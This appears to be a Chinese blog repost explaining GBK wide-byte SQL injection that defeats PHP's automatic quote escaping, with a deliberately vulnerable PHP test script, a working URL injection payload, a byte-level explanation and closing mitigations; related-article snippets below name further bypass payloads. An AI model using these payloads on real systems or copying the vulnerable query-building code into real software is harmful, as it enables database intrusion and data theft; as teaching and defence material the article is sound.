php单引号绕过,SQL注入绕过PHP单引号字符转义原理及预防方法

最新推荐文章于 2024-03-07 12:47:37 发布
最新推荐文章于 2024-03-07 12:47:37 发布
阅读量811 收藏 1
点赞数
文章标签: php单引号绕过

http://mo47.com/blog/2011/sql_injection_gpc

利用GBK双字节编码,绕过单引号转义

附赠工具一款:PHP汉字url编码转换器

PHP测试代码如下

/* 注入实验:start */

$id = $_GET['id'];

//建立连接

$conn = false;

$conn = mysql_connect("localhost","root","");

mysql_query("set names 'gbk'");

mysql_select_db("test", $conn);

//执行

$sql = "SELECT id,name FROM table WHERE id = '".$id."' LIMIT 1";

if(!($query = mysql_query($sql,$conn))){

echo mysql_error();

}

$result = array();

while($row = mysql_fetch_array($query,MYSQL_ASSOC)){

$result[] = $row;

}

echo '$id:'.$id."\n";

echo '$sql:'.$sql."\n";

print_r($result);

/* 注入实验:end */

常规注入

URL:http://localhost/a.php?id=10%20AND%201=2

SQL:

SELECT downid,name FROM x_downs WHERE projectid = '10 AND 1=2' LIMIT 1

其中由于projectid = ‘$id’被单引号括住了,1=2,1=1暂时失效了

绕过去吧

不过我们可以通过汉字双字节编码进行注入

URL:http://localhost/a.php?id=10%D6‘%20AND%201=2%23

SQL:

SELECT downid,name FROM x_downs WHERE projectid = '10謀' AND 1=2#' LIMIT 1

可以看到在‘前面加了个%D6后,引号被吃掉了

原理

php会针对URL编码进行decode

decode后,url参数为 ?id=10 0xD6 ‘ 0×20 AND 0×20 1=2 0×23

magic_quotes_gpc处理时会自动转义,即在‘前面加一个\

处理后url参数变成: ?id=10 0xD6 0x5c ‘ 0×20 AND 0×20 1=2 0×23

可以看到,在‘前面PHP会自动加一个0x5c(注:0x5c为\),也就是会自动转义成\’

由于汉字是双字节的,所以0xD6 0x5c被转为謀这个汉字,’之前的\就这样消失了

最后的%23为#,在sql中#是注释,所以后面的’就没用了

最终sql中projectid = ’10謀’在sql执行的时候,由于projectid为int类型字段,mysql会自动intval()处理一下 详情见这里

所以等效于

SELECT downid,name FROM x_downs WHERE projectid = 10 AND 1=2

达到我们成功注入的目的

解决方法

两种

1.对用户的输入信息严格检查和过滤

2.针对本方法,进行如下修改

(1)切勿在连接设置字符集时:set names ‘gbk’

(2)当有类似设置时character_set_connection=gbk, character_set_results=gbk, character_set_client=binary

将character_set_client必须设置为binary

注:主要作用是在传输数据时使用binary的形式,避免了由于php将0xd6和0x5c合成一个汉字的问题

许清尘
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php绕过分号(;)和尖括号(<>)转义
逗比大师的博客
03-24 2202
实战中发现可写文件且内容可控,尝试写入phpinfo,发现分号(;)和尖括号(<>)被转义,如:尝试写入 <?php phpinfo();?> 实际得到: \<?php phpinfo()\;?\> 分析分号(;)和尖括号(<>)两处转义,其中第一个尖括号转义不属于php内部,不起到转义作用,只是一个普通文本,不需要处理,第二个尖括号可以不...
php 拼接 单双引拼接,双字节编码绕PHP单引号转义又一例: SQL UPDATE注入
weixin_28999575的博客
03-11 222
原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》http://www.redicecn.com/view-256.html是一样的。// by redice 2010.10.21// 连接mysql数据库$conn=0;$conn = mysql_connect("localhost","root","redice2009");if (!$conn){die("不能打开数据库连接...
SQL注入绕过PHP单引号字符转义原理预防方法
热门推荐
MyDriverC
01-05 2万+
PHP测试代码如下 /* 注入实验:start */ $id = $_GET['id']; //建立连接 $conn = false; $conn = mysql_connect("localhost","root",""); mysql_query("set names 'gbk'"); mysql_select_db("test", $conn);  //执行 $sql
sql注入(三)绕过方法及防御手段
最新发布
Innocence_0的博客
03-07 1189
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
常见php函数绕过
huangyongkang666的博客
03-31 4038
PHP常见函数介绍 1. is_numeric() 函数 作用:检测变量是否为数字或数字字符串。 PHP 版本要求:PHP 4, PHP 5, PHP 7 is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后 绕过: ?what=1' ?what=1, ?what=1%00 2.isset函数 **作用:**检测变量是否设置 格式:bool isset ( mixed var [, mixed var [, …]] ) 返回值: 若变量不存在则返
SQL注入绕过
西电卢本伟的博客
03-24 4328
文章目录什么是绕过注释符号绕过双写绕过大小写绕过空格绕过等号绕过内联注释绕过参数污染绕过宽字节注入 什么是绕过 个人理解是系统或者安全软件为了避免攻击者篡改一些参数来获取数据,就会自动过滤一些篡改信息的关键词。但系统和软件终究是人编写出来的,攻击者们还是有各种各样的方法绕过安全点的检测来达到自己的目的。 注释符号绕过 双写绕过 大小写绕过 空格绕过 等号绕过 内联注释绕过 参数污染绕过 宽字节注入 ...
php 单引号绕过,利用UTF8字节编码能否绕过PHP单引号转义进行注入
weixin_30914751的博客
03-13 627
利用GBK双字节编码可以绕过单引号转义进行注入,这在之前的文章中已经分析过了(《利用GBK双字节编码突破PHP单引号转义限制进行SQL注入》,http://www.redicecn.com/html/wangluoanquan/20101018/180.html)。今天来讨论一下是否能够利用UTF8字节编码绕过转义。先回顾一下GBK编码绕转义原理:GBK编码的字节范围是:首字节:0x81-0xF...
浅谈oracle中单引号转义
12-16
ORACLE 单引号转义: 在ORACLE中,单引号有两个作用:  ...第二个单引号被作为转义符,第三个单引号转义,可将sql写成这样更好理解:  select ' '' ' from dual; output:' // 2.连接符‘||’导
MS-SQL Server 中单引号的两种处理方法
01-19
而采用非绑定方式时许多程序员大都忽略了对单引号的特殊处理,一旦SQL语句的查询条件的变量有单引号出现,数据库引擎就会报错指出SQL语法不对,本人发现有两种方法可以解决和处理这种单引号的问题(以VB为例子)。...
sql注入转义php函数代码
01-20
sql注入:  正常情况下:  delete.php?id=3; $sql = ‘delete from news where id = ‘.$_GET[‘id’];... 有时候从客户端传来的数据,可能恶意包含些特殊的字符,比如单引号、斜杠等,所以需要转义
SQL中的转义字符
12-14
之前写了篇文章《Oracle转义字符》,说到了Oracle中单引号“’”的转义字符单引号“’”,那么其他的特殊字符转义字符又是什么呢,如模糊查询的占位符“%”,“_”等。  经过测试,在Oracle中不能再使用单引号...
SQL注入绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
SQL注入 引号转义绕过
Auroraxsn的博客
04-25 1万+
问题描述 做了一个靶场,注入点为数字类型,一开始一帆风顺,直到爆破列名的时候突然报错,页面突然就没了,毫无征兆...报错时的url如下: ?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name="users" 查看源码: $sql="SELECT * FROM users wher
绕过PHP代码执行中的过滤限制详解
LYJ20010728的博客
06-02 2040
绕过PHP代码执行中的过滤限制详解代码执行函数字符串拼接绕过字符转义绕过多次传参绕过内置函数访问绕过异或绕过绕过URL编码取反绕过递增递减运算符绕过上传临时文件 代码执行函数 PHP中具有代码执行功能的函数 eval():最常见的代码执行函数,把字符串 code 作为PHP代码执行 eval ( string $code ) : mixed assert():检查一个断言是否为false assert()会检查指定的assertion并在结果为false时采取适当的行动,在PHP5或P
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8123
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
SQL中的单引号转义
二木成林
08-15 1万+
如果我们查找字段中带有单引号的记录,如下面这种: 查找username为lisi's的记录,我们按照通常的查询SQL是这样的: select * from user where username='lisi's'; 很明显,报错了,因为它单独把"lisi"当作一个字符串来进行匹配了,而不是"lisi's"这个字符串。 解决就是将单引号进行转义,在SQL中将单引号进行转义字符也是一个单引号。 所以将"lisi's"改为"lisi''s",在原来的基础上添加一个单引号,对原单引号进行转..
SQL注入类型总结
zlloveyouforever的博客
03-15 862
简单介绍各种常见的SQL注入类型,相对都比较初级,进阶操作还需要自己去了解。
sql注入之宽字节注入
Au
03-17 2080
Bugku上看到一道这方面的题,从网上看了不少资料,谈一谈自己的认识。     题目链接:                  103.238.227.13:10083/                        当我们在地址栏输入单引号时页面并没有报错,         说明单引号应该被过滤了,转义为 \'  防止注入                  查看源代码      ...
CTFhub-SQL注入
Moyv的博客
01-27 2995
CTFhub-SQL注入
SQL注入如何绕过单引号
05-26
SQL 注入中,单引号通常用于将用户输入的字符串括起来,以便在 SQL 查询语句中使用。为了绕过单引号防护,攻击者可以使用以下技术: 1. 使用双引号代替单引号:有些数据库支持使用双引号代替单引号。例如,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值